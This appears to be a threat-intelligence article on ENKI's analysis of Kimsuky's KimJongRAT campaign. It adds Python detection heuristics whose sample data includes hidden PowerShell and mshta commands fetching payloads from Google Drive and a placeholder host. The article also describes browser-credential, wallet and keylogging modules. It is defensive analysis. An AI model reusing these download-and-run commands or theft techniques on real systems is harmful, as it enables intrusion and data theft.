A newly published investigation by the ENKI WhiteHat Threat Research Team reveals a rapidly expanding and increasingly sophisticated cyber-espionage campaign by Kimsuky, the DPRK-linked threat actor, leveraging upgraded variants of KimJongRAT across South Korea.
The report describes an attack chain that blends phishing emails, weaponized LNK files, PowerShell-based RAT modules, Google Drive–hosted payloads, and GitHub Releases abuse—all orchestrated to maximize stealth and data-theft efficiency.
The campaign begins with phishing emails impersonating South Korean public agencies such as the Ministry of Gender Equality and Family and the National Tax Service. These emails deliver ZIP archives containing a password-protected decoy PDF and a malicious LNK file disguised as text.
Once the LNK file is opened, it reaches out through a C2 hop server that ultimately downloads payloads from GitHub. The attacker deliberately uploads malware to the Releases section, where “history, such as commit logs, is not recorded.”
This leaves investigators no commit history to review and conceals how often the malware has been revised.

The downloaded HTA files—pw.hta, doc.hta, or kyc.hta—handle both decoy display and malware staging. They download passwords from Google Drive to open the decoy PDF, creating a false sense of legitimacy.
These HTA files detect Windows Defender status and dynamically select the next-stage payload: a PE dropper or a PowerShell RAT. If Defender is stopped, victims receive v3.log (a PE chain); if Defender is active, they receive pipe.log (a PowerShell chain).
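The staging step above (an HTA host that decides between a PE dropper and a PowerShell RAT, both fetched from cloud hosting) leaves a recognisable process-creation footprint. The following triage heuristic is an added example written from the defender's side; it is not code from ENKI's report. It scans constructed Sysmon-style process-creation records (the field names and the sample command lines are assumptions) and flags an HTA host spawning PowerShell or rundll32, a script host whose command line references a Google Drive or GitHub Releases location, and mshta.exe executing a remote .hta.

```python
import re
from dataclasses import dataclass

# Children an HTA opened from a mail attachment has no business launching.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "rundll32.exe"}
# Staging locations named in the article; plain substrings, not IoCs.
STAGING_MARKERS = ("drive.google.com", "github.com", "/releases/download/")
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b")


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed field names)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(ev: ProcEvent) -> list[str]:
    """Return the list of reasons this event looks like HTA-driven staging."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    cmd = ev.command_line.lower()
    reasons = []
    if parent == "mshta.exe" and child in SCRIPT_CHILDREN:
        reasons.append(f"mshta.exe spawned {child}")
    if child in SCRIPT_CHILDREN | {"mshta.exe"} and any(m in cmd for m in STAGING_MARKERS):
        reasons.append("script host references a cloud staging location")
    if child == "mshta.exe" and REMOTE_HTA.search(cmd):
        reasons.append("mshta.exe executing a remote .hta")
    return reasons


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons, keeping only events that fired a rule."""
    result = {}
    for i, ev in enumerate(events):
        reasons = flag_event(ev)
        if reasons:
            result[i] = reasons
    return result


# Constructed sample events; hostnames and IDs are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\chrome.exe",
              "chrome.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iwr https://drive.google.com/uc?id=EXAMPLE -OutFile pipe.log\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://hop.example/pw.hta"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, reasons)
```

The rules are deliberately narrow: the last sample (svchost.exe launching rundll32.exe with a local DLL) is ordinary Windows behaviour and must not fire, while the PowerShell child of mshta.exe fires twice, once for its parent and once for the Google Drive download in its command line.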
Once decrypted, the PE chain deploys sys.dll, an obfuscated module that performs:
- Anti-VM checks
- RC4-decryption of configuration
- Download of three Google Drive–hosted modules: app64.log, net64.log, and main64.log
The app64.log module is a precisely engineered tool used solely to retrieve Chrome’s AppBound Encryption master keys.
ENKI confirms: “The attacker built this module on top of a publicly available tool… designed to extract sensitive data from Chromium browsers.”
The net64.log module conducts extensive data theft, collecting:
- OS and hardware data
- Process lists
- Installed software
- Email client credentials
- Browser cookies, passwords, extensions
- Messenger data (Telegram/Discord)
- Cryptocurrency wallet files
- GPki/NPKI certificate stores
All exfiltrated data is archived as micro.log.zip and later transmitted to the C2 server.
The final PE-stage module, main64.log, establishes persistence and connects to the C2 domain kzloly.nmailhub[.]com for ongoing operations. It sets up four threads to handle:
- Clipboard capture
- Keylogging
- File enumeration
- Bi-directional C2 tasking
The report notes: “The C&C communication thread runs every 10 minutes to upload exfiltrated data… execute remote commands, and perform malware updates.”
The malware’s stealth features include timestamp forgery to match rundll32.exe, masking keylogging activity.
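Copying rundll32.exe's timestamps onto a dropped module is a form of timestomping, and the copy itself is the artifact to hunt for. The function below is an added example, not part of ENKI's report: given the timestamps of the reference binary and a list of files collected from a triage image (constructed sample values, assumed path layout), it reports files outside the Windows directory whose creation and modification times both match rundll32.exe within a tolerance. Files under C:\Windows are skipped because genuine OS binaries from the same build legitimately share timestamps.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class FileTimes:
    """Creation and modification time of one file (assumed collection format)."""
    path: str
    created: datetime
    modified: datetime


def timestomp_candidates(reference: FileTimes, files: list[FileTimes],
                         tolerance: timedelta = timedelta(seconds=1)) -> list[tuple[str, str]]:
    """Return (path, reason) for user-space files whose times mirror the reference."""
    hits = []
    for f in files:
        if f.path.lower() == reference.path.lower():
            continue
        in_windows_dir = f.path.lower().startswith("c:\\windows\\")
        same_created = abs(f.created - reference.created) <= tolerance
        same_modified = abs(f.modified - reference.modified) <= tolerance
        if same_created and same_modified and not in_windows_dir:
            hits.append((f.path, "created/modified times match rundll32.exe"))
    return hits


# Constructed sample data: timestamps are invented, not real build times.
RUNDLL32 = FileTimes(r"C:\Windows\System32\rundll32.exe",
                     datetime(2019, 12, 7, 9, 8, 4, 123456),
                     datetime(2023, 5, 10, 11, 22, 33, 654321))

SAMPLE_FILES = [
    # Dropped module with copied timestamps: should be flagged.
    FileTimes(r"C:\Users\user\AppData\Local\Temp\sys.dll",
              RUNDLL32.created, RUNDLL32.modified),
    # OS binary from the same build: legitimately identical, excluded by path.
    FileTimes(r"C:\Windows\System32\kernel32.dll",
              RUNDLL32.created, RUNDLL32.modified),
    # Ordinary user document: unrelated timestamps.
    FileTimes(r"C:\Users\user\Documents\report.docx",
              datetime(2025, 3, 2, 14, 0, 0), datetime(2025, 3, 2, 14, 5, 0)),
]

if __name__ == "__main__":
    for path, reason in timestomp_candidates(RUNDLL32, SAMPLE_FILES):
        print(path, "->", reason)
```

On a real image the reference times come from the host's own rundll32.exe, not a fixed value, since they differ between Windows builds.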
Beginning in 2024, Kimsuky operated a parallel PowerShell-based attack chain. By mid-2025, ENKI found that the attackers had merged both variants into a unified workflow, enabling them to dynamically switch between payloads depending on the environment.
The PowerShell chain collects:
- OS and CPU data
- Installed software
- Recent file lists
- Browser credentials
- Wallet directories
- Telegram artifacts
It then uploads the collected data as an archive named init.dat, XOR-encoded with the single byte 0xFE.
The report highlights the RAT’s functionality: “In effect, by placing rd, wr, and cmd on the C2, the attacker enables the Work function to interact with the server for file uploads, downloads, and remote command execution.”
Alongside KimJongRAT deployment, ENKI identified a growing network of phishing sites that mirror the login pages of South Korean services including Naver, Kakao, and Nate.
The phishing pages proxy the real login page while silently stealing credentials. The report warns: “The phishing page operates as a proxy that loads the legitimate login page while siphoning data passing between the victim and the page.”
One phishing page even contains attacker-added JavaScript with Korean-language comments—suggesting either a South Korean–style coder or an LLM imitation.
ENKI WhiteHat cites several indicators that align the campaign with past DPRK operations:
- Korean-language resource metadata
- PDB paths linking earlier malware families
- SSL fingerprint reuse across multiple phishing domains
- Overlaps with BabyShark, Giant Baby, and Baby Coin campaigns
The report concludes: “This analysis uncovered additional evidence supporting earlier reports that linked the KimJongRAT variant to the DPRK-nexus threat actor Kimsuky. Tactics such as crafting fake phishing sites… and conducting tailored spear-phishing using victims’ personal information are hallmarks of Kimsuky.”